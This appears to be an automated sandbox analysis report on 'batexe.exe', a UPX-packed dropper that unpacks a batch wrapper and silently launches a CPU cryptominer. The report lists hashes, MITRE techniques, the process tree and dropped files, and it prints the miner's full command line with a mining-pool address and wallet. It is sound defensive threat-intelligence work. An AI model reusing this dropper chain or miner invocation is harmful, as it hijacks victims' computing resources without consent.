73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
289s
platform
windows10-2004_x64
resource
win10v2004-20240220-ja
resource tags

arch:x64arch:x86image:win10v2004-20240220-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
20/02/2024, 18:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4023562663-3911442808-1494947993-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4023562663-3911442808-1494947993-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3336	b2e.exe
3552	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3552	cpuminer-sse2.exe
3552	cpuminer-sse2.exe
3552	cpuminer-sse2.exe
3552	cpuminer-sse2.exe
3552	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/620-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 620 wrote to memory of 3336	620	batexe.exe	83
PID 620 wrote to memory of 3336	620	batexe.exe	83
PID 620 wrote to memory of 3336	620	batexe.exe	83
PID 3336 wrote to memory of 2572	3336	b2e.exe	85
PID 3336 wrote to memory of 2572	3336	b2e.exe	85
PID 3336 wrote to memory of 2572	3336	b2e.exe	85
PID 2572 wrote to memory of 3552	2572	cmd.exe	87
PID 2572 wrote to memory of 3552	2572	cmd.exe	87

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:620
- C:\Users\Admin\AppData\Local\Temp\61A8.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\61A8.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\61A8.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6477.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2572
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\61A8.tmp\b2e.exe

Filesize
7.1MB

MD5
91828392ff364ce222a41001765a6278

SHA1
e1505a197e63c5f88eb0b652a19421dea1a4706e

SHA256
5461fddf8f644b2d9c3650cef860e34ea406480d590b017ae4adcf8d058dd273

SHA512
cf674dd5b2c030b38179b0a52231304ba3522ccd7d4d65302770d5058d4edaf92b2e42c24c23e390b5a2553b6597963cba294f2d352e1e5b5ea88b69ee057883

Download Submit
C:\Users\Admin\AppData\Local\Temp\61A8.tmp\b2e.exe

Filesize
2.8MB

MD5
aefe4251a29dca4efe46a541a104c3df

SHA1
96db6434b9b63a16fce99c08fed09df2ac7f3110

SHA256
63a99391ce51e1eb52bbe4af716b185064ad5f6a8a507f818bdf77b1e4226aba

SHA512
04828a1800d025086d2eba85186b5271e90fef6523473b14b6cd795d7d45fbb9f75b6c96094c1e37b6d54e3362cab06d926ed2f4d1f0f8bcbc704fe064b13486

Download Submit
C:\Users\Admin\AppData\Local\Temp\61A8.tmp\b2e.exe

Filesize
2.7MB

MD5
8bf8f5c9d34334938bf32fc15bc9404d

SHA1
fc6b04c193ad23f74ea2a395d67fabfd9ac4aeae

SHA256
176555a7e230054dfb5acb067e8b9306657c5c574f903e67fec1ffe8ecd0a372

SHA512
47658beffb531e00acbd6e1949d549fc8a936f8af46020fb94f6664bac9d153137fdbd2a9b8fb0a5747a06810949cada5de0a014bfcb1928819904c906293dce

Download Submit
C:\Users\Admin\AppData\Local\Temp\6477.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.4MB

MD5
0fc6bc40d010d6e7e4a9d75ef769642d

SHA1
7a689565655f4c2772140e00449ffaac9ed26561

SHA256
052ea7ac06108c61bbfb3c25c40aa6349a33533017e481c31c42c2cbdf9c03a5

SHA512
d211764359089c8545319dbc7f25f9d53020d2cda1e0eb84abb28069f6f09278e07281b897cfbbc094740f3d0853fa21a156203655cf4795eb132fcb876d0931

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.3MB

MD5
f505bff3a5cc8da9a2e2764787c391a4

SHA1
f43336df9161fc9b544c8f083cab89992b70520f

SHA256
180bf923a1d9f05e4013d303bf2033a0aa492b6ad705dd145b09f4a2856076fd

SHA512
beeffd780f9640414420468a64d55065f2de5dc7f024035fc65cf2dae270b89fece2788b3a7d2b7dd6f8349b9e07467432d59b89c7f4d3f7d8256e775441b326

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
914KB

MD5
10ef2d3b484270c23b93187ac6c708f3

SHA1
35c6730942ebf4e9089ea7a5ce2f9fc104e710ee

SHA256
70d606e9a01ea120dfcac8d7ce3082928ade12b2811cbca7a36eb08b7c5dc340

SHA512
56b14d986d441ef9c204e40578fbebbffb023a34bf8a2bc263d6288bbbb8b36ce9a808efb8cc34883417e53158bfe0b0a748ad556655d34d9bbf35e1cfd1eee9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
892KB

MD5
75b0a0aed10926a8367f680be74d679b

SHA1
dc1c965552558d61156fd2af10bb9450013cb603

SHA256
cf1aee7b41e4a6b3909e508f649a67c21f1a27efc0c211e4a08030ef558e6a09

SHA512
67a964c9c74b7d8982a5ef567c3c23da8e31ae436432a53fea0e02fa67dbb0f91fbf7ac031b654170d83d9c88f3007ea9873575b9be619bc01fcb87341a279ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
943KB

MD5
3848a1c7bdbb54951cac5975a0693793

SHA1
182376ec146ae48366eb233cca33efc0636ac1e1

SHA256
68154b88006732178b4f15a65e01516d5abe61fbf16e64ec9aa7f6822dbcfb28

SHA512
a402db584cf7e995234ec53ce8aa2933fbaf887204327af7fd5c53ac3c1372c33120368cd20ab118bfbe28bcb1bef7a4d3260d677e0903f59d25cc7d48a7ef3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
628KB

MD5
811ee547e2c89fdd124a5ce3a520400d

SHA1
0fa9df9e7805f1fb960fecafd9f0e14b77f79de7

SHA256
8ec62f3cff6dfab8f87335fe504bfa4a1920388c28f70be8077cdee5830a21fb

SHA512
f0fd27fa80e05b6964669a3ca7363ea0abb611fac95c50ff54e194d8f0f4ce58cb1698c6bffdbd2bf58d1f10c2e39ef3de5b45890f2724c21a68fd6abc3c3598

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.2MB

MD5
90a1258a903eed90f5df0e43467f4d93

SHA1
65ee13e33d7752b997291a0b57e4d5c0584607bc

SHA256
8d7cba5b8ee188b799ac2e39a8288378078a2887b414b6c3abcdaefd60557865

SHA512
18a5ac67b1a37259f4c0a77bf12da74f2c674a48698d1f4d3eedd2cce6966610b538c699993c1e514f73fa515111abcccdd4260dca921363fe2a0db292a43c4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/620-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3336-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3336-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3552-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3552-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3552-46-0x0000000071090000-0x0000000071128000-memory.dmp

Filesize
608KB

Download
memory/3552-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/3552-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3552-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3552-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3552-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3552-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3552-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3552-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3552-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3552-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3552-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download